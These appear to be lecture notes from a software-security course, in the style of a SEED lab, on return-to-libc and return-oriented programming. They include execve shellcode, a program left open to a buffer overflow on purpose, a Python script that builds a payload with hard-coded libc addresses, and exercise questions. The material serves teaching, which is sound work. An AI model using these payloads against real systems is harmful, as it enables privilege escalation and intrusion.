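Software Security: return-to-libc
- Overview
- Attack environment
- Attack phase
- Finding the address of system()
- Finding the address of the string /bin/sh
- Part 2: return-to-libc
- Function prologue
- Return-oriented programming
- Problems
Overview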
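A buffer-overflow attack injects malicious code onto the target program's stack and then runs it. To defend against this, operating systems use a countermeasure called the non-executable stack. This defense can be bypassed by another attack that does not need to run any code on the stack: the return-to-libc attack.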
shellcode.c
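#include <string.h>

const char code[] =
    "\x31\xc0"      /* xorl  %eax,%eax  */
    "\x50"          /* pushl %eax       */
    "\x68""//sh"    /* pushl $0x68732f2f */
    "\x68""/bin"    /* pushl $0x6e69622f */
    "\x89\xe3"      /* movl  %esp,%ebx  */
    "\x50"          /* pushl %eax       */
    "\x53"          /* pushl %ebx       */
    "\x89\xe1"      /* movl  %esp,%ecx  */
    "\x99"          /* cdq              */
    "\xb0\x0b"      /* movb  $0x0b,%al  */
    "\xcd\x80";     /* int   $0x80      */

int main(int argc, char **argv)
{
    char buffer[sizeof(code)];
    strcpy(buffer, code);       /* copy the code onto the stack */
    ((void (*)())buffer)();     /* execute the code from the stack */
}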
[06/14/21]seed@VM:~$ mkdir return-to-libc
[06/14/21]seed@VM:~$ cd return-to-libc/
[06/14/21]seed@VM:~/return-to-libc$ vim shellcode.c
[06/14/21]seed@VM:~/return-to-libc$ gcc -z execstack shellcode.c
[06/14/21]seed@VM:~/return-to-libc$ a.out
$ ^C # a new shell has been spawned
$ ^C
$ exit
[06/15/21]seed@VM:~/return-to-libc$ gcc -z noexecstack shellcode.c # make the stack non-executable
[06/15/21]seed@VM:~/return-to-libc$ a.out # result
Segmentation fault
To change the executable-stack bit of a binary that has already been compiled, use the execstack tool.
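One region of memory holds a large amount of code, mostly standard C library functions. On Linux this is libc, which is dynamically linked.
The libc function that is easiest to exploit is system().
The principle of the attack: the data the attacker supplies sits on the non-executable stack and is never run there. When the function returns through the overwritten stack, control transfers into the executable shared library instead, and that is where the attack takes effect.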
Attack environment
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str)
{
    char buffer[100];
    strcpy(buffer, str);    /* no bounds check: this is the overflow */
    return 1;
}

int main(int argc, char **argv)
{
    char str[400];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);
    printf("Returned Properly\n");
    return 1;
}
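Attack phase
Finding the address of system()
When a program that needs libc runs, the libc library is loaded into memory.
Note that for the same program, the address at which libc is loaded differs depending on whether the program is set-uid or non-set-uid.
Finding the address of the string /bin/sh
For system() to run "/bin/sh", the string "/bin/sh" must already be in memory, and its address must be passed to system() as the argument. One way to get it there is an environment variable, whose address the small program below prints: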
export MYSHELL="/bin/sh"
#include <stdio.h>
#include <stdlib.h>

int main()
{
    char *shell = (char *)getenv("MYSHELL");
    if (shell) {
        printf(" Value: %s \n", shell);
        printf(" Address: %x\n", (unsigned int)shell);
    }
    return 1;
}
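Part 2: return-to-libc
Relative to the frame pointer ebp of foo(), the return address sits at ebp + 4. This is the slot that the overflow from buffer must overwrite with the address of system().
Once the distance from buffer to ebp is known, the offsets of all three values from the start of the buffer follow directly:
the address of system() goes at distance + 4
the address of exit() goes at distance + 8
the address of the string /bin/sh goes at distance + 12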
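The arithmetic behind the three offsets can be sketched in a few lines of Python. This is only an illustration: the function name libc_offsets is made up here, and the distance 108 is an assumed value (it would normally be read off in a debugger), chosen because it reproduces the offsets 112, 116 and 120 used by the exploit script later in this article.

```python
WORD = 4  # size of one address on 32-bit x86


def libc_offsets(ebp_minus_buffer):
    """Offsets, from the start of buffer, of the three slots to overwrite.

    ebp_minus_buffer is the distance in bytes between foo()'s ebp
    and the start of buffer (an input you have to measure yourself).
    """
    return {
        "system": ebp_minus_buffer + 1 * WORD,  # foo()'s return-address slot
        "exit": ebp_minus_buffer + 2 * WORD,    # return address seen by system()
        "bin_sh": ebp_minus_buffer + 3 * WORD,  # first argument seen by system()
    }


if __name__ == "__main__":
    # 108 is a hypothetical distance, not a value taken from the article.
    print(libc_offsets(108))
```

If the measured distance on your machine differs, only the argument changes; the +4, +8, +12 spacing stays the same.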
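Function prologue
When a function is called, the return address (RA) is pushed onto the stack. This is the state at the very start of the function, before the prologue executes; the stack pointer (the esp register) points at the RA.
The prologue then does three things. First, the previous frame pointer is pushed onto the stack, so that the caller's frame pointer can be restored when the function returns.
The stack pointer now points at the saved previous frame pointer. Second, the frame pointer (ebp) is set to the current stack pointer, so the frame pointer always points at the saved previous frame pointer.
Third, the stack pointer is moved by N bytes to make room for the function's local variables.
The epilogue undoes these steps. The stack pointer is set back to where the frame pointer points, which frees the stack space allocated for local variables.
The saved previous frame pointer is popped into %ebp, restoring the caller's frame pointer.
Finally, the return address is popped off the stack and the program jumps to it. This instruction also moves the stack pointer.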
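The prologue and epilogue steps above can be traced with a small Python model of the stack. This is a toy simulation, not real machine code: the class name Stack32 and all addresses are invented for illustration, and memory is just a dictionary from address to 32-bit word.

```python
class Stack32:
    """Toy model of a 32-bit x86 stack (grows toward lower addresses)."""

    def __init__(self, esp, ebp):
        self.mem = {}   # address -> 32-bit word
        self.esp = esp
        self.ebp = ebp

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value

    def call(self, return_address):
        self.push(return_address)   # call pushes the RA

    def prologue(self, local_bytes):
        self.push(self.ebp)         # save the previous frame pointer
        self.ebp = self.esp         # ebp now points at the saved value
        self.esp -= local_bytes     # reserve N bytes for locals

    def epilogue(self):
        self.esp = self.ebp         # release the locals
        self.ebp = self.pop()       # restore the caller's frame pointer
        return self.pop()           # ret: pop the RA and jump to it


if __name__ == "__main__":
    # All numbers below are hypothetical.
    s = Stack32(esp=0xBFFFF000, ebp=0xBFFFF020)
    s.call(0x08048500)
    s.prologue(local_bytes=16)
    print("RA is stored at ebp + 4:", hex(s.mem[s.ebp + 4]))
    print("ret jumps to:", hex(s.epilogue()))
```

The model makes the key fact for the attack visible: inside a function, the return address is the word at ebp + 4, so whatever the overflow writes there is where ret will jump.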
/* prog.c */
void foo(int x)
{
    int a;
    a = x;
}

void bar()
{
    int b = 5;
    foo(b);
}
gcc -S compiles the program to assembly code.
#!/usr/bin/python3
import sys

# Fill content with non-zero bytes
content = bytearray(0xaa for i in range(300))

a3 = 0xbfffff56     # address of "/bin/sh"
content[120:124] = (a3).to_bytes(4, byteorder='little')

a2 = 0xb7e56260     # address of exit()
content[116:120] = (a2).to_bytes(4, byteorder='little')

a1 = 0xb7e63310     # address of system()
content[112:116] = (a1).to_bytes(4, byteorder='little')

# Write the payload to badfile
with open("badfile", "wb") as file:
    file.write(content)
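Because the vulnerable program copies the input with strcpy(), a zero byte anywhere before the last overwritten slot would cut the payload short; this is also why the script fills content with non-zero bytes. The helper below is a minimal sketch for checking this before running the attack. The function names are invented for illustration, and 0xb7e56200 is a made-up address used only to show a failing case.

```python
def has_null_byte(address):
    """True if the 32-bit little-endian encoding of address contains 0x00."""
    return 0 in address.to_bytes(4, byteorder="little")


def bytes_copied_by_strcpy(payload):
    """Payload bytes strcpy() copies before the first zero byte.

    Returns len(payload) when the payload contains no zero byte at all.
    """
    end = bytes(payload).find(b"\x00")
    return len(payload) if end == -1 else end


if __name__ == "__main__":
    # The three addresses used in the script above.
    for addr in (0xb7e63310, 0xb7e56260, 0xbfffff56):
        print(hex(addr), "contains a zero byte:", has_null_byte(addr))

    # Hypothetical bad case: an address whose lowest byte is 0x00.
    bad = bytearray(0xaa for _ in range(300))
    bad[112:116] = (0xb7e56200).to_bytes(4, byteorder="little")
    print("bytes copied:", bytes_copied_by_strcpy(bad))
```

If one of the real addresses on your system does contain a zero byte, the payload as written would not reach the later slots, and a different target address or copy path would be needed.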
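system(cmd) does not run cmd directly; it first runs /bin/sh, which in turn runs cmd.
Return-oriented programming
A return-to-libc attack does not have to return to whole existing functions. Dropping that restriction generalizes return-to-libc into return-oriented programming (ROP).
The attacker jumps to code outside the stack rather than code on the stack; this is the core idea of return-to-libc.
Problems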
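1. After using the "-z noexecstack" option to compile a C program, a buffer-overflow
attack that causes the vulnerable program to return to the code on the stack is supposed
to fail, but some students find out that the attack is still successful. What could be the
reason? The students did everything correctly.
A likely reason is that "-z noexecstack" only marks the binary as requesting a non-executable stack. The protection itself is enforced by the operating system with hardware support (the NX bit), so on a machine or VM without that support the stack stays executable and the injected code still runs. A return-to-libc attack, by contrast, succeeds either way, because it runs system(), which lies outside the stack.
2. In the function epilogue, the previous frame pointer, which is stored in the area below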
the return address, will be retrieved and assigned to the ebp register. However, when
we overflow the return address, the previous frame pointer region is already modified, so
after the function epilogue, ebp contains some arbitrary value. Does this matter?
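For this attack it generally does not matter. The first thing system() does in its prologue is push ebp and then set ebp to the current esp, so the arbitrary value is only saved on the stack and is never used as a frame base while system() runs.
3. Instead of jumping to the system() function, we would like to jump to the execve()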
function to execute "/bin/sh". Please describe how to do this. You are allowed to
have zeros in your input (assume that memcpy() is used for memory copy, instead of
strcpy())
4. As we know, the system() function calls /bin/sh, which is a symbolic link to
/bin/bash. Recent versions of bash will drop the privilege if it detects that the
effective user ID and the real user ID are different. Assume that we still want to use
system() in our Return-to-libc attack, please describe how you can overcome this
challenge. You are allowed to have zeros in your input (assume that memcpy() is used
for memory copy, instead of strcpy())
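bash drops privileges only when the effective and real user IDs differ, so the two must be made equal before system() runs. One way is to chain a call to setuid(0) ahead of system(): in a root-owned set-uid program this sets the real user ID to 0 as well. The argument 0 consists of zero bytes, which is why the question allows zeros in the input.
5. When launching the return-to-libc attack, instead of jumping to the beginning of the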
system() function, an attacker causes the program to jump to the first instruction right
after the function prologue in the system() function. Please describe how the attacker
should construct the input array.
6. Can address space layout randomization help defeat the return-to-libc attack?
Yes, it helps. The attack hard-codes the addresses of system(), exit(), and the "/bin/sh" string. With ASLR enabled these addresses change from run to run, so the attacker has to guess them instead of reading them off once.
7. Does ASLR in Linux randomize the addresses of library functions, such as system()?
Yes.
8. Assuming that we do not have the function system() that we can return to in our
Return-to-libc attack, but we know the instruction sequence A1, ..., Am, B1, ..., Bn, C1,
..., Ct can spawn a shell for us. If all the instructions in this sequence are located in
contiguous memory, we can simply jump to its beginning. Unfortunately, that is not the
case. The instructions in this sequence actually come from three sub-sequences, A, B, and
C, each of which is found at the end of a function, i.e., there is always a ret instruction
at the end of each sub-sequence. Each sub-sequence’s address is given below:
0xAABB1180: A1, ..., Am, ret
0xAABB2290: B1, ..., Bn, ret
0xAABB33A0: C1, ..., Ct, ret
Obviously, when we overflow a buffer, we will place 0xAABB1180 in the return address
field, so when the function returns, it will jump to the beginning of the sub-sequence
A. Please describe what other values that you would place on the stack, so when the
sub-sequence A returns, it will jump to the sub-sequence B, and when the sub-sequence
B returns, it will jump to the sub-sequence C.
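One possible layout for this question can be sketched in Python. It rests on an assumption the question does not state: each sub-sequence leaves esp exactly where it found it (no net pushes or pops), so each ret simply pops the next word on the stack. Under that assumption, the words placed right after the overwritten return address are the addresses of B and then C. The function name rop_chain is made up for illustration.

```python
def rop_chain(gadget_addresses):
    """Concatenate 32-bit little-endian gadget addresses.

    The first address goes in the return-address slot; every following
    address goes in the next word above it. Assumes each gadget leaves
    esp unchanged apart from its final ret.
    """
    return b"".join(a.to_bytes(4, byteorder="little") for a in gadget_addresses)


if __name__ == "__main__":
    # Addresses of sub-sequences A, B and C as given in the question.
    chain = rop_chain([0xAABB1180, 0xAABB2290, 0xAABB33A0])
    print(chain.hex())  # 8011bbaa9022bbaaa033bbaa
```

If a sub-sequence does pop values off the stack, filler words for those pops would have to be inserted between the addresses; the sketch does not handle that case.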
What is described above is called Return-Oriented Programming (ROP), which is a
generalized Return-to-libc technique. The Return-to-libc technique depends on the
availability of some functions such as system(); if such functions are not in the
memory, the technique will not work. With the ROP technique, an attacker can carefully
choose machine instruction sequences that are already present in the machine’s memory,
such that when these sequences are chained together, they can achieve the intended goal.
These sequences are called gadgets, which typically end in a return (ret) instruction
and are located in a subroutine within the existing program and/or shared library code.
The ret instruction is necessary, because the ROP technique depends on it to jump from
one sub-sequence to another. ROP gadgets can be chained together to allow an attacker to
perform arbitrary operations. Using ROP, the attacker does not need to call functions to
mount an attack.
Function foo() has a buffer overflow problem when copying your input to a buffer
that is inside its stack frame. We would like to get it to return to a sequence of function
calls: bar() ➙ bar() ➙ bar() ➙ xyz(3, 5) ➙ exit(). Assume we
know their addresses. Please describe how you would use the buffer overflow problem to
construct the stack before letting foo() return. You should provide a stack diagram in
your answer.
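A possible stack layout for this last question, written as a Python sketch. It assumes 32-bit x86 with the usual calling convention (arguments on the stack, each function using the prologue and epilogue described earlier) and a copy that tolerates zero bytes, since the arguments 3 and 5 contain them. The addresses are hypothetical placeholders, and the function name call_chain is invented here.

```python
import struct

# Stack diagram, starting at foo()'s return-address slot (low to high):
#   +0   address of bar()    <- foo() returns here
#   +4   address of bar()    <- first bar() returns here
#   +8   address of bar()    <- second bar() returns here
#   +12  address of xyz()    <- third bar() returns here
#   +16  address of exit()   <- return address seen by xyz()
#   +20  3                   <- first argument of xyz()
#   +24  5                   <- second argument of xyz()


def call_chain(bar, xyz, exit_addr):
    """Words to write starting at foo()'s return-address slot."""
    words = [bar, bar, bar, xyz, exit_addr, 3, 5]
    return struct.pack("<7I", *words)


if __name__ == "__main__":
    # Hypothetical addresses, for illustration only.
    payload = call_chain(bar=0x080484BB, xyz=0x080484D6, exit_addr=0xB7E56260)
    print(payload.hex())
```

In this layout exit() sees the word 3 as its own return address and 5 as its argument; since exit() does not return, the bogus return address is never used.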